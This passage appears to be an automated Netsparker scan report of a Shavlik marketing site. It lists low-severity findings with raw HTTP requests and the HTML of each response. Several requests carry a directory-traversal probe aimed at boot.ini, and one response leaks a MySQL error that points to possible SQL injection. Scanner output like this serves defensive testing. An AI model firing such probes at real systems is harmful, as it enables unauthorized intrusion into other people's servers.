</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">25-Apr-11 07:16 AM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=../../../../../../../../../../boot.ini&pg=697&h=0&hp=69..

Parameters

Parameter Type Value
m GET ../../../../../../../../../../boot.ini
pg GET 697
h GET 0
hp GET 697
utm_term GET vulnerability management
utm_campaign GET PatchManagement
utm_mt GET e
gclid GET CPC_jKTPt6gCFUh-5QodsROzEA

Request

GET /shavlik/index.cfm?m=../../../../../../../../../../boot.ini&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799687; CFTOKEN=56587765
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:16:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>






































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near './../../../../../../../../../boot.ini AND DMMESSAGE.userCompanyID = 21 ORD' at line 7
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


















<tr><td>

<table border="0" cellpadding="0" cellspacing="0">



</table>
</td></tr>




<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">25-Apr-11 07:16 AM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /shavlik/index.cfm

/shavlik/index.cfm CONFIRMED

http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20managem..

Identified Cookie

CFID

Request

GET /shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:16:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=799688;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/,CFTOKEN=55208339;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>













































































































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Security software - Free trial Shavlik automated patch mgmt + antivirus</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
<script language="javascript" type="text/javascript">
function windowOpen(sURL, bFade, sWindowName) {

if (bFade) {
document.getElementById("body").style.backgroundColor = "gray";
}

sWindowName = sWindowName || "newWindow";

nPosX = (window.screen.width/2) - (400);
nPosY = (window.screen.height/2) - (350 + 75);

newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

newWindow.focus();

}


var req;

function docLoad(url) {
req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
} catch(e) {
req = false;
}
// IE
} else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
req = false;
}
}
}

if(req) {
//req.onreadystatechange = processReqChange;
req.open("GET", url, false);
req.send("");

}

//req = false;

}

function downloadRecord(fileID)
{

sURL = "download.cfm?nFileID=" + fileID + "&a=1";
docLoad(sURL);

}


</script>
<link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css">
<script type="text/javascript" src="shadowbox/shadowbox.js"></script>
<script type="text/javascript">

function userCheck(sURL,nID) {

docLoad('userCheck.cfm');

if (req.responseText == 'num0') {

Shadowbox.open({
content: 'download.cfm?nFileID=0&a=1',
player: "iframe"
});

return true;

}

else if (sURL.search('.wmv') != -1) {

Shadowbox.open({
content: sURL,
player: "html",
width: 700,
height: 570

});

downloadRecord(nID);

return true;

}

else {

Shadowbox.open({
content: sURL,
player: "flv",
width: 640,
height: 364

});

downloadRecord(nID);

return true;
}

}

Shadowbox.init({
modal: true

});

</script>

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-22410401-11']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>


</head>








































































































































































































































































<body> <div id="wrapper"> <div style="background-image:url('images/SHAV_topBar.jpg'); background-repeat:no-repeat; height:30px;"></div> <div id="container"> <div id="logo"> <a href="index.cfm?pg=374" target="_blank"><img src="images/SHAV_INT_downloadForm_btn.jpg" style="border:none; float:right; margin-right:20px;"></a> </div> <div id="topContainer"> <img src="images/Shav_LP_serious_safe.png" style="margin:-25px 0 -20px 65px; position:absolute;">

<div id="content">
<h1 style="font-size:40px; margin-top:0;">Comprehensive security software that can make life easier</h1>
<img src="images/SHAV_LP_patch_logo.png">

<p class="contentCopy">
<strong>NetChk®</strong> Protect is the comprehensive agentless patch management system designed to meet today’s most pressing IT challenges. NetChk® Protect simplifies the complexity of IT management by automating patching – for both your operating system and for third-party applications – so you’re protected from every angle.
<br /><br />
In less than 30 minutes, <strong>NetChk®</strong> Protect will be up and running, detecting and deploying missing patches.
<br /><br />
<strong>NetChk®</strong> Protect also includes the Sunbelt VIPRE Enterprise Antivirus + Antispyware + Antimalware engine to integrate world-class antivirus protection with comprehensive patch management for faster, more cost-effective network security.
</p>
</div>
<div style="background-image:url('images/SHAV_blackLine.jpg'); background-repeat:no-repeat; height:19px;"></div> </div> <div id="bottomContainer"><!--- bottomContainer ---> <div id="leftBottom">
<a href="index.cfm?pg=704" style="text-decoration:none;"><h2>SimplexITy Bundle Savings of 80% <img src="images/Shav_LP_serious_arrow.png" style="border:0;"></h2></a>

<h3 style="font-style:italic;">For a limited time, the more Shavlik IT Management products you use, the more you save.</h3>
<p class="bottomCopy">NetChk® Protect is part of the Shavlik SimplexITy Bundle, the ultimate IT management solution for network professionals. Combining our best-in-class network security and IT management applications, the bundle is the comprehensive answer to your patch management, antivirus, power management, and configuration challenges.</p>

<h3 style="font-style:italic;">Explore the Shavlik SimplexITy Bundle:</h3>

<p class="bottomCopy">Click on the links below for detailed information on each functionality that can simplify your IT workload:</p>

<ul class="bottomCopy" style="margin-left:15px; padding:0; line-height:26px;">
<li><a href="index.cfm?pg=697" class="current">Automated Patch Management</a></li>
<li><a href="index.cfm?pg=698">Next-generation Enterprise Antivirus</a></li>
<li><a href="index.cfm?pg=701">Centralized Power Management</a></li>
<li><a href="index.cfm?pg=699">Simplified Configuration and Compliance</a></li>
</ul>
</div> <div id="middleBottom">
<p class="bottomCopy" style="margin-top:0;">For a fraction of the money you spend for antivirus protection today, you can simplify the complexity of IT management and have complete protection against your top security threats.</p>

<img src="images/Shav_LP_serious_piggyBank.jpg" style="padding-top:10px;">
</div> <!--- formDIV ---> <div id="rightBottom"> <tr> <td> <form name="DownloadInfo" method="post" action="http://www.shavlik.com/pDownloadForm4.aspx" id="DownloadInfo" style="text-align: center;" target="regFrame"> <p id="formHeader">Download a FREE Trial Today</p>

<p class="bottomCopy" style="margin-bottom:0;">Register today to try Shavlik’s NetChk® Protect patch management - or save even more by upgrading to the SimplexITy bundle! <span style="font-style:italic; font-size:11px;">* Denotes Required Fields</span></p>

<div style="display:none;">
<input type="checkbox" name="caseStudy" id="caseStudy" value="1">

<input type="checkbox" name="webinar" id="webinar" value="1">

<input type="checkbox" name="netchk" id="netchk" value="1" checked>
</div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" v..
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /shavlik/index.cfm

/shavlik/index.cfm

http://learn.shavlik.com/shavlik/index.cfm?m=../../../../../../../../../../boot.ini&pg=697&h=0&hp=69..

Parameters

Parameter Type Value
m GET ../../../../../../../../../../boot.ini
pg GET 697
h GET 0
hp GET 697
utm_term GET vulnerability management
utm_campaign GET PatchManagement
utm_mt GET e
gclid GET CPC_jKTPt6gCFUh-5QodsROzEA

Request

GET /shavlik/index.cfm?m=../../../../../../../../../../boot.ini&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799687; CFTOKEN=56587765
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:16:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
alert("Please enter your email address");
}

else if((document.getElementById('m_txtEmail').value.indexOf(".") == -1) || document.getElementById('m_txtEmail').value.indexOf("@") == -1)
{
alert("Please enter a valid email address");
}

else if(document.getElementById('m_txtPhone').value == "" || document.getElementById('m_txtPhone').value.length < 10 || document.getElementById('m_txtPhone').value.length > 50)
{
alert("Please enter your Phone Number, at least 10 characters");
}

else if(document.getElementById('m_txtCompany').value == "")
{
alert("Please enter your Company Name");
}
else if(document.getElementById('m_ddlStates').value == 0)
{
alert("Please Choose Your State");
}
else if(document.getElementById('sEmployees').value == '')
{
alert("Please Choose the size of your company");
}
else if(document.getElementById('sTitle').value == '')
{
alert("Please Choose your job title");
}

else
{
sLN = document.getElementById('m_txtLastName').value;


document.getElementById('DownloadInfo').action = '/shavlik/download.cfm?nFileID=0&pg=697';
document.getElementById('DownloadInfo').target = 'regFrame2';
document.getElementById('DownloadInfo').submit();

document.getElementById('m_txtLastName').value += ' -O';

if(document.getElementById('netchk').checked == 1)
{
empNode = document.getElementById('sEmployees');
empNode.parentNode.removeChild(empNode);

titleNode = document.getElementById('sTitle');
titleNode.parentNode.removeChild(titleNode);

document.getElementById('DownloadInfo').action = 'http://www.shavlik.com/pDownloadForm4.aspx';
document.getElementById('DownloadInfo').target = 'regFrame';
document.getElementById('DownloadInfo').submit();

}

document.getElementById('m_txtLastName').value = sLN;

if(document.getElementById('netchk').checked == 1){
sNET = document.getElementById('netchk').value = 1;
}
else
{
sNET = document.getElementById('netchk').value = 0;
}

if(document.getElementById('caseStudy').checked == 1)
{
sCASE = document.getElementById('caseStudy').value = 1;
}
else
{
sCASE = document.getElementById('caseStudy').value = 0;
}

if(document.getElementById('webinar').checked == 1)
{
sWEB = document.getElementById('webinar').value = 1;
}
else
{
sWEB = document.getElementById('webinar').value = 0;
}

retValue = true;

sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>






































<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.

</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">






















<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Error Executing Database Query.
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near './../../../../../../../../../boot.ini AND DMMESSAGE.userCompanyID = 21 ORD' at line 7
</font>
</td>
</tr>
<tr>
<td height>&nbsp;</td>
</tr>


















<tr><td>

<table border="0" cellpadding="0" cellspacing="0">



</table>
</td></tr>




<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>

<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>


<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>

</ul>
<p>
</td>
</tr>

<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">173.193.214.243</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana"></td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time&nbsp;&nbsp;</td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">25-Apr-11 07:16 AM</td>
</tr>
</table>
</td>
</tr>
</table>



</font>
</td>
</tr>
</table>
</body></html>







ViewState is not Encrypted

ViewState is not Encrypted

1 TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>
You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>      

Remedy References

- /shavlik/index.cfm

/shavlik/index.cfm

http://learn.shavlik.com/shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20managem..

ViewState Version

.NET Framework 2.x

Request

GET /shavlik/index.cfm?m=1112&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:16:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=799686;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/,CFTOKEN=50906304;expires=Wed, 17-Apr-2041 12:16:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


































































































































<iframe name = "regFrame" id = "regFrame" style="display:none;" width="800" height=400></iframe>
<iframe name = "regFrame2" id = "regFrame2" style="display:none;" width="800" height=400></iframe>

<script type="text/javascript">

function formCheck() {

retValue = false;

if(document.getElementById('m_txtFirstName').value == "" || document.getElementById('m_txtFirstName').value.length < 2 || document.getElementById('m_txtFirstName').value.length > 55)
{
alert("Please enter your First Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtLastName').value == "" || document.getElementById('m_txtLastName').value.length < 2 || document.getElementById('m_txtLastName').value.length > 55)
{
alert("Please enter your Last Name, between 2 and 55 characters");
}

else if(document.getElementById('m_txtEmail').value == "")
{
